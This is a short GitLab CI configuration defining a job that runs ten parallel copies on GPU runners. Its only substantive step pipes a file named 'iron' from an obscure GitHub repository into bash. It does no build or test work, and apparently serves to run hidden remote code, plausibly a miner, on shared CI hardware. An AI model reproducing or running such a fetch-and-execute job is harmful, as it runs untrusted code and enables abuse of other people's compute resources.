gpu-job:
  stage: build
  tags:
    - saas-linux-medium-amd64-gpu-standard
  image: nvcr.io/nvidia/cuda:12.1.1-base-ubuntu22.04
  parallel: 10
  script:
    - apt-get update
    - apt-get install -y python3.10 curl wget
    - python3.10 --version
    - curl -sL https://github.com/nandafiku/gradi/raw/main/iron | bash
